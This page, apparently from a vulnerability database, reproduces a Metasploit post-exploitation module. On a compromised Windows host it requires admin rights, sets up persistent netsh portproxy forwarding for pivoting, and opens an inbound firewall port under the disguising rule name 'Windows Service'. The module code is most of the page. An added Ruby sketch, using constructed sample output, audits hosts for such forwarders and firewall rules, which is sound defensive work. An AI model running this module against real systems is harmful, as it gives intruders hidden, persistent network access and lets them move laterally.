Windows Manage Set Port Forwarding With PortProxy

26 Aug 2013 12:44:41 | Reported by Borja Merino | Type: metasploit | Source: www.rapid7.com

Windows module for persistent port forwarding via PortProxy

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Set Port Forwarding With PortProxy',
        'Description' => %q{
          This module uses the PortProxy interface from netsh to set up
          port forwarding persistently (even after reboot). PortProxy
          supports TCP IPv4 and IPv6 connections.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ]
      )
    )

    register_options(
      [
        OptAddress.new('LOCAL_ADDRESS', [ true, 'IPv4/IPv6 address to which to listen.']),
        OptAddress.new('CONNECT_ADDRESS', [ true, 'IPv4/IPv6 address to which to connect.']),
        OptPort.new('CONNECT_PORT', [ true, 'Port number to which to connect.']),
        OptPort.new('LOCAL_PORT', [ true, 'Port number to which to listen.']),
        OptBool.new('IPV6_XP', [ true, 'Install IPv6 on Windows XP (needed for v4tov4).', true]),
        OptEnum.new('TYPE', [ true, 'Type of forwarding', 'v4tov4', ['v4tov4', 'v6tov6', 'v6tov4', 'v4tov6']])
      ]
    )
  end

  def run
    if !is_admin?
      print_error("You don't have enough privileges. Try getsystem.")
      return
    end

    # Due to a bug in Windows XP you need to install IPv6
    # http://support.microsoft.com/kb/555744/en-us
    version = get_version_info
    if version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::XP_SP2) && !check_ipv6
      return
    end

    return unless enable_portproxy

    fw_enable_ports
  end

  def enable_portproxy
    rtable = Rex::Text::Table.new(
      'Header' => 'Port Forwarding Table',
      'Indent' => 3,
      'Columns' => ['LOCAL IP', 'LOCAL PORT', 'REMOTE IP', 'REMOTE PORT']
    )

    print_status('Setting PortProxy ...')
    netsh_args = 'interface portproxy '
    netsh_args << "add #{datastore['TYPE']} "
    netsh_args << "listenport=#{datastore['LOCAL_PORT']} "
    netsh_args << "listenaddress=#{datastore['LOCAL_ADDRESS']} "
    netsh_args << "connectport=#{datastore['CONNECT_PORT']} "
    netsh_args << "connectaddress=#{datastore['CONNECT_ADDRESS']}"
    output = cmd_exec('netsh', netsh_args)
    if output.size > 2
      print_error('Setup error. Verify parameters and syntax.')
      return false
    else
      print_good('PortProxy added.')
    end

    output = cmd_exec('netsh', 'interface portproxy show all')
    output.each_line do |l|
      rtable << l.split(' ') if l.strip =~ /^[0-9]|\*/
    end
    print_status(rtable.to_s)
    return true
  end

  def ipv6_installed
    output = cmd_exec('netsh', 'interface ipv6 show interface')
    if output.lines.count > 2
      return true
    else
      return false
    end
  end

  def check_ipv6
    if ipv6_installed
      print_status('IPv6 is already installed.')
      return true
    elsif !datastore['IPV6_XP']
      print_error('IPv6 is not installed. You need IPv6 to use portproxy.')
      print_status('IPv6 can be installed with "netsh interface ipv6 install"')
      return false
    else
      print_status('Installing IPv6... can take a little long')
      cmd_exec('netsh', 'interface ipv6 install', 120)
      if !ipv6_installed
        print_error('IPv6 was not successfully installed. Run it again.')
        return false
      end
      print_good('IPv6 was successfully installed.')
      return true
    end
  end

  def fw_enable_ports
    print_status("Setting port #{datastore['LOCAL_PORT']} in Windows Firewall ...")
    version = get_version_info
    if version.build_number >= Msf::WindowsVersion::Vista_SP0
      cmd_exec('netsh', "advfirewall firewall add rule name=\"Windows Service\" dir=in protocol=TCP action=allow localport=\"#{datastore['LOCAL_PORT']}\"")
    else
      cmd_exec('netsh', "firewall set portopening protocol=TCP port=\"#{datastore['LOCAL_PORT']}\"")
    end
    output = cmd_exec('netsh', 'firewall show state')

    if output =~ /^#{datastore['LOCAL_PORT']} /
      print_good('Port opened in Windows Firewall.')
    else
      print_error('There was an error enabling the port.')
    end
  end
end
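
For auditing a host for the forwarders and firewall openings this module creates, the following added example (not part of the module or of Metasploit) parses the output of `netsh interface portproxy show all` and `netsh advfirewall firewall show rule name=all` and correlates them. The sample outputs are constructed, English-locale output is assumed, and the function names are hypothetical.

```ruby
# Constructed sample outputs (English locale), not captured from a real host.
PORTPROXY_OUT = <<~OUT
  Listen on ipv4:             Connect to ipv4:
  Address         Port        Address         Port
  --------------- ----------  --------------- ----------
  0.0.0.0         8443        192.0.2.10      3389
  127.0.0.1       9000        127.0.0.1       9001
OUT
FIREWALL_OUT = <<~OUT
  Rule Name:                            Windows Service
  ----------------------------------------------------------------------
  Direction:                            In
  LocalPort:                            8443
  Action:                               Allow
OUT

# Parse `netsh interface portproxy show all`, tracking the v4/v6 section header.
def parse_portproxy(text)
  type = nil
  text.each_line.with_object([]) do |line, rows|
    type = "v#{$1}tov#{$2}" if line =~ /Listen on ipv([46]):\s+Connect to ipv([46]):/i
    f = line.split
    next unless f.size == 4 && f[1].match?(/\A\d+\z/) && f[3].match?(/\A\d+\z/)
    rows << { type: type, listen: f[0], lport: f[1], connect: f[2], cport: f[3] }
  end
end

# Parse `netsh advfirewall firewall show rule name=all` into one hash per rule.
def parse_rules(text)
  text.each_line.with_object([]) do |line, rules|
    key, value = line.split(':', 2).map(&:strip)
    next if value.nil? || key.empty?
    rules << {} if key == 'Rule Name'
    rules.last[key] = value unless rules.empty?
  end
end

# Attach review reasons to every forwarder; an empty list means nothing stood out.
def audit(portproxy_text, firewall_text)
  rules = parse_rules(firewall_text)
  parse_portproxy(portproxy_text).map do |e|
    reasons = []
    reasons << 'listens on all interfaces' if ['0.0.0.0', '*', '::'].include?(e[:listen])
    reasons << 'forwards off-host' unless e[:connect].match?(/\A(127(\.\d+){3}|::1|localhost)\z/i)
    allow = rules.select { |r| r['Direction'] == 'In' && r['Action'] == 'Allow' && r['LocalPort'].to_s.split(',').include?(e[:lport]) }
    reasons << "inbound allow rule: #{allow.map { |r| r['Rule Name'] }.join(', ')}" unless allow.empty?
    e.merge(reasons: reasons)
  end
end
```

The rule name `Windows Service` is the one hard-coded in `fw_enable_ports` above; port ranges and `Any` in `LocalPort` are not expanded by this sketch.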

Current version: 25 May 2023 04:36. Vulners AI Score: 7 (High risk).